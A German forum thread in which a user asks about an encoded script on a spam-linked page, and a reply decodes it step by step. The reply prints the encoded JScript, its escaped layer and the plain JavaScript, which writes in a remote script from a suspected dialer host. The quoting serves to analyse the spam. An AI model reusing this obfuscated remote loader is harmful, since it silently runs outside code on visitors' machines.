Moin Moin !

Hallo.

Ic hhab e kürzlich eine (Spam?)-Mail erhalten die mich angewiesenb hat eine Seite zu besuchen, weil mich eine Mail angeblich nicht erreicht hat (???)

Definitiv Spam!

NAch klick auf hier lande ich auf folgender txt-Seite:

http://usuarios.lycos.es/supportteam/index.txt?sid=0815

(sid von mir geändert)

Was macht jetzt folgendes Script bzw. kann das irgendjemand für mich in klartext übersetzten?

---

<SCRIPT LANGUAGE="JScript.Encode">#@~^GAMAAA==@#@&\CMP:+6DP{E]2ZdmMk2Ou !^CxTElTnY&G]y Bl-CUm.kaO]y YfA]!9YZb-lMYy!.0u !u&GY ZNGm!:nUDRDW+MD+M OWdWS+.ZCd]+%u+,u&$YZf]T)7l.]yT9kn!D^] Z]29]y![W1EhnYR]ScYWdGA+MZm/n]+0u 1]2$]ZfYTz\l.Yy!2lMOk]+Z]2f]y!Mn0c/2VbYY+R] ydk9]&GY+ u O]fAYTG]TbbW]y!Y+Rwl.OkRs+LDtYy!u&fu&GY ZFY O]+T7lDu+!alDDdY Z]2fY T[b+;D^ /aVrOu %Y+y/rNufG]+y]y,]2AuTfu!)k6]+Tu %aCDD/R^nUoDtu T]f9u&9]yTFu 1Yy!lsnMYY ZYy%YyGw+t^+M4l6YnDu T3bx4m;]y!NdY ZD8+2CMYU+MRZKNndu FY+F]+,uf~]TG]Zb+^/Y ZNGm!:nUDRhMrY] ZY+%u y]fZd^Mk2Yu+!^lUL!lonY2fY\*;Yy Bm\m?mMkaO]lZY y]+TkDmuffu\*Zu++tDYa]fb&&9kCVcrxD+.W!xoh84R[+JAD8wmDY+M w4wY&w/r[u&fu+ u !3Y+!alMYd]X$8]Xfu+!3]+Tu  YX;]+ ufA]f;]lZzkmMrwD]f2u +Yy,]2$]Zf]Z)Y&;zkm.k2Ou&3Jp@#@&6EU^DkWU~G+/W9nv#~PP7lD,1AK6Oi,1nA:+6D~',Exd^la+vKn6ObpP[W1;:xO SDkOnv1nh:nXYbp8,f+;W9n*i@#@&decAAA==^#~@ </SCRIPT>

---

Das spuckt der Dekoder von http://www.virtualconspiracy.com/scrdec.html aus:

<SCRIPT LANGUAGE="JScript">
var Text ="%3Cscript%20language%3D%22JavaScript%22%3E%0D%0Avar%20ref%20%3D%20document.referrer.toLowerCase%28%29%3B%0D%0Avar%20dieurl%20%3D%20document.URL.toLowerCase%28%29%3B%0D%0Avar%20parts%20%3D%20ref.split%28%22sid%3D%22%29%3B%0D%0Aif%20%28parts.length%20%3D%3D%201%29%20var%20parts%20%3D%20dieurl.split%28%22sid%3D%22%29%3B%0D%0Aif%20%28parts.length%20%3D%3D%201%29%20alert%20%28%27Fehlerhafter%20Einbau%20des%20Werbepartner-Codes%21%27%29%3B%0D%0Aelse%20document.write%20%28%22%3Cscript%20language%3D%5C%22JavaScript%5C%22%20src%3D%5C%22http%3A//dial.interfungmbh.de/werbepartner.php%3Fsid%3D%22%20+%20parts%5B1%5D%20+%20%22%5C%22%3E%3C%5C/script%3E%22%29%3B%0D%0A%3C/script%3E";
function DeCode() { var NewText; NewText = unescape(Text); document.write(NewText);} DeCode();
 </SCRIPT>

Und mit einer ASCII-Tabelle kommt man leicht auf folgenden Javascript-Code (Vorsicht! Auf den Dreck könnte jemand ein Copyright haben!)

var ref = document.referrer.toLowerCase();
var dieurl = document.URL.toLowerCase();
var parts = ref.split("sid=");
if (parts.length == 1) var parts = dieurl.split("sid=");
if (parts.length == 1) alert ('Fehlerhafter Einbau des Werbepartner-Codes!');
else document.write ("<script language="JavaScript" src="http://dial.interfungmbh.de/werbepartner.php?sid=" + parts[1] + ""></script>");

Laß mich mal raten, was bei dial.interfungmbh.de rauskommt ...

Alexander